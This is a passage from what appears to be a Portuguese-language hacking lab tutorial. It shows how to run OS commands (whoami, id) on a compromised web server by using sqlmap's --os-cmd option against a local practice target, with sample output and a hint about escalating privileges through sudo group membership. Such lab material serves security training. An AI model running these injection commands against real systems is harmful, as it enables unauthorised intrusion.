Executar um Comando Simples como whoami ou id
Nesta etapa, você executará comandos comuns do Linux como whoami e id para coletar informações sobre o contexto de usuário e grupo sob o qual o processo do servidor web está rodando. Esta informação é crucial para entender os privilégios que você tem no sistema comprometido.
Primeiro, vamos executar o comando whoami:
sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="whoami" --batch
Após o sqlmap terminar, ele exibirá a saída do comando whoami. Isso será tipicamente o nome de usuário sob o qual o servidor web (por exemplo, www-data, apache, ou labex em nosso ambiente de laboratório) está rodando.
...
[INFO] saída do comando do SO recuperada:
labex
...
Em seguida, execute o comando id. Este comando fornece informações mais detalhadas, incluindo o ID do usuário (UID), ID do grupo (GID) e todos os grupos aos quais o usuário pertence.
sqlmap -u "http://127.0.0.1:8000/index.php?id=1" --os-cmd="id" --batch
A saída do comando id se parecerá com algo assim:
...
[INFO] saída do comando do SO recuperada:
uid=1000(labex) gid=1000(labex) groups=1000(labex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
...
Analisar esta saída ajuda você a entender as permissões disponíveis para você. Por exemplo, se o usuário faz parte do grupo sudo, pode ser possível escalar privilégios.